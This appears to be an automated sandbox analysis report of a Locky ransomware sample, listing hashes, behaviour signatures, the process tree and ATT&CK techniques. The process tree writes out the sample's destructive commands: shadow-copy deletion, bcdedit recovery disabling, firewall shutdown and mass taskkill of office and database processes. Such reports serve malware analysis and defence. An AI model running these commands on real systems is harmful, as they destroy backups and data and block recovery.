Analysis

  • max time kernel
    110s
  • max time network
    112s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    14-04-2021 11:01

General

  • Target

    b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe

  • Size

    169KB

  • MD5

    98562209465bec53327e65649a2b8829

  • SHA1

    3a47656ed3df213bd934aa01078a863568fe9f2b

  • SHA256

    b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe

  • SHA512

    c11ce14f9cb75df2bc9bd81971c1f8fa885815715f389eb8e796e0f657de59756b36a6f896c216a03c7be7bb3ddff9b8a47aee71146760e4f4d9c6bdc0ff2cc3

Malware Config

Signatures

  • Locky

    Ransomware strain released in 2016, with advanced features like anti-analysis.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Modifies extensions of user files 8 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Drops file in Program Files directory 1 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 13 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 58 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe
    "C:\Users\Admin\AppData\Local\Temp\b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe"
    1⤵
    • Modifies extensions of user files
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:640
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c vssadmin delete shadows /all /quiet
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3756
      • C:\Windows\system32\vssadmin.exe
        vssadmin delete shadows /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:204
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c wmic shadowcopy delete /nointeractive
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3064
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic shadowcopy delete /nointeractive
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2940
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3240
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {current} bootstatuspolicy ignoreallfailures
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:2748
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c netsh advfirewall set allprofiles state off
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4032
      • C:\Windows\system32\netsh.exe
        netsh advfirewall set allprofiles state off
        3⤵
          PID:1172
      • C:\Windows\SYSTEM32\cmd.exe
        cmd.exe /c bcdedit /set {current} recoveryenabled no
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3160
        • C:\Windows\system32\bcdedit.exe
          bcdedit /set {current} recoveryenabled no
          3⤵
          • Modifies boot configuration data using bcdedit
          PID:3680
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c taskkill /f /im note*
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3716
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im note*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4156
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c taskkill /f /im powerpnt*
        2⤵
          PID:260
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /f /im powerpnt*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4180
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /c taskkill /f /im winword*
          2⤵
            PID:276
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im winword*
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4188
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c taskkill /f /im Exchange*
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:3820
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im Exchange*
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4164
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c taskkill /f /im tomcat*
            2⤵
              PID:2088
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im tomcat*
                3⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4224
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /c taskkill /f /im apache*
              2⤵
                PID:2280
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im apache*
                  3⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4280
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c taskkill /f /im java*
                2⤵
                  PID:2160
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im java*
                    3⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4292
                • C:\Windows\SysWOW64\cmd.exe
                  cmd.exe /c taskkill /f /im python*
                  2⤵
                    PID:632
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /f /im python*
                      3⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4316
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /c taskkill /f /im post*
                    2⤵
                      PID:884
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /f /im post*
                        3⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4380
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /c taskkill /f /im vee*
                      2⤵
                        PID:1140
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /f /im vee*
                          3⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4340
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd.exe /c taskkill /f /im sql*
                        2⤵
                          PID:2120
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /f /im sql*
                            3⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4268
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd.exe /c taskkill /f /im excel*
                          2⤵
                            PID:184
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /f /im excel*
                              3⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4204
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c taskkill /f /im mys*
                            2⤵
                              PID:3860
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /f /im mys*
                                3⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4368
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c ping 127.0.0.1>nul & del /q C:\Users\Admin\AppData\Local\Temp\b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe
                              2⤵
                                PID:4860
                                • C:\Windows\SysWOW64\PING.EXE
                                  ping 127.0.0.1
                                  3⤵
                                  • Runs ping.exe
                                  PID:4904
                            • C:\Windows\system32\vssvc.exe
                              C:\Windows\system32\vssvc.exe
                              1⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2596

                            Network

                            MITRE ATT&CK Matrix ATT&CK v6

                            Persistence

                            Modify Existing Service

                            1
                            T1031

                            Defense Evasion

                            File Deletion

                            2
                            T1107

                            Discovery

                            Remote System Discovery

                            1
                            T1018

                            Impact

                            Inhibit System Recovery

                            3
                            T1490

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • memory/184-129-0x0000000000000000-mapping.dmp
                            • memory/204-122-0x0000000000000000-mapping.dmp
                            • memory/260-127-0x0000000000000000-mapping.dmp
                            • memory/276-128-0x0000000000000000-mapping.dmp
                            • memory/632-135-0x0000000000000000-mapping.dmp
                            • memory/640-114-0x0000000010000000-0x000000001001C000-memory.dmp
                              Filesize

                              112KB

                            • memory/884-137-0x0000000000000000-mapping.dmp
                            • memory/1140-136-0x0000000000000000-mapping.dmp
                            • memory/1172-121-0x0000000000000000-mapping.dmp
                            • memory/2088-132-0x0000000000000000-mapping.dmp
                            • memory/2120-131-0x0000000000000000-mapping.dmp
                            • memory/2160-134-0x0000000000000000-mapping.dmp
                            • memory/2280-133-0x0000000000000000-mapping.dmp
                            • memory/2748-123-0x0000000000000000-mapping.dmp
                            • memory/2940-124-0x0000000000000000-mapping.dmp
                            • memory/3064-117-0x0000000000000000-mapping.dmp
                            • memory/3160-119-0x0000000000000000-mapping.dmp
                            • memory/3240-118-0x0000000000000000-mapping.dmp
                            • memory/3680-125-0x0000000000000000-mapping.dmp
                            • memory/3716-126-0x0000000000000000-mapping.dmp
                            • memory/3756-116-0x0000000000000000-mapping.dmp
                            • memory/3820-130-0x0000000000000000-mapping.dmp
                            • memory/3860-138-0x0000000000000000-mapping.dmp
                            • memory/4032-120-0x0000000000000000-mapping.dmp
                            • memory/4156-139-0x0000000000000000-mapping.dmp
                            • memory/4164-140-0x0000000000000000-mapping.dmp
                            • memory/4180-141-0x0000000000000000-mapping.dmp
                            • memory/4188-142-0x0000000000000000-mapping.dmp
                            • memory/4204-143-0x0000000000000000-mapping.dmp
                            • memory/4224-144-0x0000000000000000-mapping.dmp
                            • memory/4268-145-0x0000000000000000-mapping.dmp
                            • memory/4280-146-0x0000000000000000-mapping.dmp
                            • memory/4292-147-0x0000000000000000-mapping.dmp
                            • memory/4316-148-0x0000000000000000-mapping.dmp
                            • memory/4340-149-0x0000000000000000-mapping.dmp
                            • memory/4368-150-0x0000000000000000-mapping.dmp
                            • memory/4380-151-0x0000000000000000-mapping.dmp
                            • memory/4860-152-0x0000000000000000-mapping.dmp
                            • memory/4904-153-0x0000000000000000-mapping.dmp